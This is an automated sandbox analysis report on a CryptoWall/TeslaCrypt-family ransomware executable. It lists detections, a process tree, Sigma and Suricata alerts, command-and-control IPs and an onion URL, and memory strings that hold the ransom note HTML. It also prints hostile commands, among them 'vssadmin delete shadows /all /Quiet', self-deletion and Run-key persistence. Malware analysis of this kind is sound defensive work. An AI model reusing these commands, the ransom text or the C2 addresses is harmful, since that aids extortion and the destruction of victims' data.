Windows Analysis Report
0t8amSU3vd.exe

Overview

General Information

Sample name: 0t8amSU3vd.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
Analysis ID: 1586217
MD5: ed98ce8f541e6871d1f39943ce09dfa3
SHA1: 1fa08e8ce2c70daf4a3456eb53e48484b20d3d12
SHA256: ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981

Detection

CryptoWall, TrojanRansom
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CryptoWall ransomware
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to determine the online IP of the system
Creates autostart registry keys with suspicious names
Creates files in the recycle bin to hide itself
Deletes itself after installation
Deletes shadow drive data (may be related to ransomware)
Drops a file containing file decryption instructions (likely related to ransomware)
Found Tor onion address
Found potential ransomware demand text
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs new ROOT certificates
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
May drop file containing decryption instructions (likely related to ransomware)
Modifies existing user documents (likely ransomware behavior)
Moves / writes many txt or jpg files (may be a ransomware encrypting documents)
Overwrites Mozilla Firefox settings
Searches for Windows Mail specific files
Sigma detected: DNS Query Tor .Onion Address - Sysmon
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Tries to harvest and steal browser information (history, passwords, etc)
Uses TOR for connection hiding
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • 0t8amSU3vd.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\0t8amSU3vd.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
    • svcmtr.exe (PID: 3504 cmdline: C:\Users\user\AppData\Roaming\svcmtr.exe MD5: ED98CE8F541E6871D1F39943CE09DFA3)
      • vssadmin.exe (PID: 3636 cmdline: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet MD5: E23DD973E1444684EB36365DEFF1FC74)
    • cmd.exe (PID: 3532 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL MD5: AD7B9C14083B52BC532FBA5948342B98)
  • svcmtr.exe (PID: 3892 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • svcmtr.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • svcmtr.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • chrome.exe (PID: 2696 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 2760 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • notepad.exe (PID: 1992 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
Source | Rule | Description | Author | Strings
2.2.svcmtr.exe.240000.0.raw.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
12.2.svcmtr.exe.400000.1.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
13.2.svcmtr.exe.240000.0.raw.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
2.2.svcmtr.exe.240000.0.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
12.2.svcmtr.exe.2c0000.0.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs

System Summary

Source: DNS query; Author: frack113; Data: Image: C:\Users\user\AppData\Roaming\svcmtr.exe, QueryName: zpr5huq4bgmutfnf.onion.to
Source: Process started; Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades); Data: Command: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , CommandLine: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , CommandLine|base64offset|contains: u^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svcmtr.exe, ParentImage: C:\Users\user\AppData\Roaming\svcmtr.exe, ParentProcessId: 3504, ParentProcessName: svcmtr.exe, ProcessCommandLine: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , ProcessId: 3636, ProcessName: vssadmin.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\svcmtr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\E722D94C1CAC34B
Source: DNS query; Author: Brandon George (blog post), Thomas Patzke; Data: Image: C:\Users\user\AppData\Roaming\svcmtr.exe, QueryName: ipinfo.io
Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, CommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\0t8amSU3vd.exe", ParentImage: C:\Users\user\Desktop\0t8amSU3vd.exe, ParentProcessId: 3452, ParentProcessName: 0t8amSU3vd.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, ProcessId: 3532, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\svcmtr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\E722D94C1CAC34B
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T21:09:59.404903+0100 | 2021723 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49164 | 199.116.254.169 | 80 | TCP
2025-01-08T21:10:02.476308+0100 | 2021723 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49165 | 185.230.63.171 | 80 | TCP
2025-01-08T21:10:03.336051+0100 | 2021723 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49166 | 185.230.63.171 | 443 | TCP
2025-01-08T21:10:04.741113+0100 | 2021723 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49167 | 34.149.87.45 | 443 | TCP
2025-01-08T21:10:05.429191+0100 | 2021723 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49168 | 67.22.44.2 | 80 | TCP
2025-01-08T21:10:08.210773+0100 | 2812134 | 1 | A Network Trojan was detected | 192.168.2.22 | 63926 | 8.8.8.8 | 53 | UDP
2025-01-08T21:10:08.228147+0100 | 2812134 | 1 | A Network Trojan was detected | 192.168.2.22 | 65510 | 8.8.8.8 | 53 | UDP
2025-01-08T21:09:59.404903+0100 | 2813018 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49164 | 199.116.254.169 | 80 | TCP
2025-01-08T21:10:02.476308+0100 | 2813018 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49165 | 185.230.63.171 | 80 | TCP
2025-01-08T21:10:05.429191+0100 | 2813018 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49168 | 67.22.44.2 | 80 | TCP
2025-01-08T21:09:37.821207+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49163 | 34.117.59.81 | 80 | TCP

AV Detection

Source: 0t8amSU3vd.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; ReversingLabs: Detection: 91%
Source: 0t8amSU3vd.exe; ReversingLabs: Detection: 91%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: 0t8amSU3vd.exe; Joe Sandbox ML: detected
Source: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/restore_files_gpmus.html; HTTP Parser: No favicon

Compliance

Source: C:\Users\user\Desktop\0t8amSU3vd.exe; Unpacked PE file: 0.2.0t8amSU3vd.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Unpacked PE file: 2.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Unpacked PE file: 11.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Unpacked PE file: 12.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Unpacked PE file: 13.2.svcmtr.exe.400000.1.unpack
Source: 0t8amSU3vd.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\chrome_BITS_2696_1526441409
Source: unknown; HTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Directory queried: number of queries: 1023
Source: C:\Users\user\Desktop\0t8amSU3vd.exe; Code function: 0_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Code function: 2_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\0t8amSU3vd.exe; Code function: 0_2_00413780 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\AppCache\V607KDWC\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.txt

Networking

Source: Network traffic; Suricata IDS: 2812134 - Severity 1 - ETPRO MALWARE AlphaCrypt .onion Proxy Domain : 192.168.2.22:63926 -> 8.8.8.8:53
Source: Network traffic; Suricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49164 -> 199.116.254.169:80
Source: Network traffic; Suricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49164 -> 199.116.254.169:80
Source: Network traffic; Suricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49165 -> 185.230.63.171:80
Source: Network traffic; Suricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49165 -> 185.230.63.171:80
Source: Network traffic; Suricata IDS: 2812134 - Severity 1 - ETPRO MALWARE AlphaCrypt .onion Proxy Domain : 192.168.2.22:65510 -> 8.8.8.8:53
Source: Network traffic; Suricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49168 -> 67.22.44.2:80
Source: Network traffic; Suricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49168 -> 67.22.44.2:80
Source: Network traffic; Suricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49166 -> 185.230.63.171:443
Source: Network traffic; Suricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49167 -> 34.149.87.45:443
Source: C:\Users\user\Desktop\0t8amSU3vd.exe; Code function: 0_2_0041A560 _memset,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,_strcpy_s,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, http://ipinfo.io/ip
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Code function: 2_2_0041A560 _memset,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,_strcpy_s,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, http://ipinfo.io/ip
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need 
your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: svcmtr.exe, 00000002.00000003.766203672.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.761900567.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.772593472.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.763661219.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000003.660754432.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFl
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DF
Source: svcmtr.exe, 00000002.00000003.765866382.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D3893591E6AE29D20734539314727D34CBC09569324EDC3FBA847A75BDF3135C565FF91C0D62040F17F6B7ADE28AF4142E8E65EDE10142FED4861228FC8CDAF99C560FF9CF9EED6D2867D0D6D84DD7E2274A9EBE9E6E8299339F55B094AD282A4FCCCF4E57AAB2E5896073C4195A72A306C97772B923C462316763BEEE779DD603DFD
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore 